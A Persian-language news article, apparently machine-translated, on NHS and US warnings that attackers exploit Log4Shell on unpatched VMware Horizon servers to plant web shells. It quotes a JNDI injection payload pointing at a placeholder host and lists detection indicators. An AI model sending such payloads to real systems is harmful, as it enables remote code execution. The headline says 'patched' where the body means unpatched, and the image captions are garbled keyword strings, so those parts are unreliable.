خبر

  • تک بورد - مقامات بریتانیا و ایالات متحده هشدار می دهند که سیستم های وصله نسبت به نقص های حیاتی Log4j آسیب پذیر هستند

    مقامات بریتانیا و ایالات متحده هشدار می دهند که سیستم های وصله نسبت به نقص های حیاتی Log4j آسیب پذیر هستند


    16 روز و 16 ساعت قبل

    یکی از آسیب‌پذیری‌های با شدت بالا در سال‌های اخیر، Log4Shell همچنان مورد حمله قرار می‌گیرد.
    مجرمان به طور فعال از آسیب‌پذیری با شدت بالا Log4Shell در سرورهایی که VMware Horizon را اجرا می‌کنند، در تلاش برای نصب بدافزاری که به آنها اجازه می‌دهد کنترل کامل سیستم‌های آسیب‌دیده را به دست آورند، سوء استفاده می‌کنند. سیستم مراقبت های بهداشتی با بودجه عمومی بریتانیا هشدار می دهد.

    CVE-2021-44228 یکی از شدیدترین آسیب پذیری هایی است که در چند سال گذشته آشکار شده است. این در Log4j قرار دارد، یک کتابخانه کد ثبت سیستم که در هزاران یا میلیون ها برنامه و وب سایت شخص ثالث استفاده می شود. این بدان معناست که پایگاه عظیمی از سیستم های آسیب پذیر وجود دارد. علاوه بر این، سوء استفاده از این آسیب‌پذیری بسیار آسان است و به مهاجمان اجازه می‌دهد تا پوسته‌های وب را نصب کنند، که پنجره‌ای فرمان برای اجرای دستورات بسیار ممتاز بر روی سرورهای هک شده ارائه می‌دهد.

    ادامه مطلب

    روز صفر در ابزار همه جا حاضر Log4j تهدیدی جدی برای اینترنت است. نقص اجرای کد از راه دور در Log4j در ماه دسامبر پس از انتشار کد اکسپلویت قبل از در دسترس بودن وصله، آشکار شد. هکرهای مخرب به سرعت شروع به بهره برداری فعال از CVE-2021-44228 برای به خطر انداختن سیستم های حساس کردند.

    حملات، از جمله حملاتی که VMware Horizon را مورد هدف قرار می‌دهند، از آن زمان ادامه داشته‌اند.

    "یک گروه تهدید ناشناخته مشاهده شده است که سرورهای VMware Horizon در حال اجرا نسخه‌های تحت تاثیر آسیب‌پذیری‌های Log4Shell را هدف قرار می‌دهد تا پایداری در آن ایجاد شود. مقامات سیستم بهداشت ملی بریتانیا نوشتند که شبکه‌ها را تحت تأثیر قرار داده است. آنها در ادامه به ارائه راهنمایی در مورد گام‌های خاصی که سازمان‌های آسیب‌دیده می‌توانند برای کاهش تهدید بردارند، ارائه کردند.

    مهمترین آنها توصیه نصب به‌روزرسانی‌ای است که VMware برای محصول Horizon خود منتشر کرد، که به سازمان‌ها ابزاری برای مجازی‌سازی می‌دهد. قابلیت های دسکتاپ و اپلیکیشن با استفاده از فناوری مجازی سازی این شرکت. مقامات NHS همچنین به نشانه‌هایی اشاره کردند که سازمان‌های آسیب‌پذیر می‌توانند برای شناسایی حملات احتمالی که ممکن است متحمل شده‌اند به دنبال آن باشند.

    ادامه مطلب

    چرا نقض Equifax احتمالاً بدترین است. درز اطلاعات شخصی همیشه این توصیه یک روز پس از آن صادر می‌شود که کمیسیون تجارت فدرال به کسب‌وکارهای مصرف‌کننده هشدار داد که سیستم‌های آسیب‌پذیر را اصلاح کنند تا از سرنوشت Equifax جلوگیری کنند. در سال 2019، آژانس گزارش‌دهی اعتبار موافقت کرد که 575 میلیون دلار برای تسویه هزینه‌های FTC ناشی از شکست در اصلاح آسیب‌پذیری شدید مشابه در یک نرم‌افزار متفاوت به نام Apache Struts بپردازد. هنگامی که یک مهاجم ناشناس از آسیب‌پذیری در شبکه Equifax سوء استفاده کرد، منجر به به خطر افتادن داده‌های حساس برای 143 میلیون نفر شد که آن را به یکی از بدترین نقض‌های داده تا کنون تبدیل کرد.

    مقامات FTC گفتند: "FTC قصد دارد از اختیارات قانونی کامل خود برای تعقیب شرکت هایی استفاده کند که اقدامات معقولی را برای محافظت از داده های مصرف کننده در برابر قرار گرفتن در معرض Log4j یا آسیب پذیری های شناخته شده مشابه در آینده انجام نمی دهند."

    NHS حداقل دومین سازمانی است که سوءاستفاده هایی را که محصول VMware را هدف قرار می دهد مشاهده می کند. ماه گذشته، محققان گزارش دادند که مهاجمان سیستم‌هایی را که VMware VCenter را با هدف نصب باج‌افزار Conti اجرا می‌کنند، هدف قرار می‌دهند.

    هدف حملاتی که سرورهای VMware Horizon وصله‌نشده را هدف قرار می‌دهند، استفاده از یک سرویس منبع باز است.

    >

    مشاوره NHS بیان کرد: "به احتمال زیاد حمله از طریق یک بار Log4Shell شبیه به ${jndi:ldap://example.com} آغاز می شود." این حمله از آسیب‌پذیری Log4Shell در سرویس Apache Tomcat که در VMware Horizon تعبیه شده است، سوء استفاده می‌کند. سپس دستور PowerShell زیر را که از ws_TomcatService.exe ایجاد شده است، اجرا می کند:"

    https://techbord.com <b>ایالات</b> <b>متحده</b> و <b>ایالات</b> <b>متحده</b> دولت <b>ایالات</b> <b>متحده</b> <b>هشدار</b> می دهند. که <b>سیستم</b> های <b>وصله</b> <b>نسبت</b> به نقص های <b>حیاتی</b> <b>Log4j</b> <b>آسیب</b> آسیب <b>پذیر</b> هستندEnlargeNHS

    پس از چند مرحله اضافی، مهاجمان می توانند یک پوسته وب را نصب کنند که ارتباط دائمی با سروری که آنها کنترل می کنند دارد. در اینجا یک نمایش از حمله آمده است:

    https://techbord.com <b>ایالات</b> <b>بریتانیا</b> و <b>ایالات</b> <b>متحده</b> آمریکا <b>هشدار</b> می <b>دهند</b> که <b>سیستم</b> های <b>وصله</b> <b>نسبت</b> به موارد نادرست دارند. <b>حیاتی</b> <b>Log4j</b> <b>آسیب</b> <b>پذیر</b> هستندEnlargeNHS

    مشاوره اضافه شد:

    سازمان‌ها باید به دنبال موارد زیر باشند:

    شواهدی مبنی بر ایجاد فرآیندهای غیرعادی ws_TomcatService.exe هر فرآیندی که حاوی "VMBlastSG" در خط فرمان باشد، تغییرات فایل به "…\VMware\VMware View\Server" appblastgateway\lib\absg-worker.js' - این فایل معمولاً در حین ارتقاء بازنویسی می شود و تغییری در آن صورت نمی گیرد

    شرکت امنیتی Pretorian در روز جمعه این ابزار را برای شناسایی سیستم های آسیب پذیر در مقیاس منتشر کرد.


    تگ ها:

    مقامات , بریتانیا , ایالات , متحده , هشدار , دهند , سیستم , وصله , نسبت , حیاتی , log4j , آسیب , پذیر , هستند


    v 14




خبرهای دیگر از فناوری اطلاعات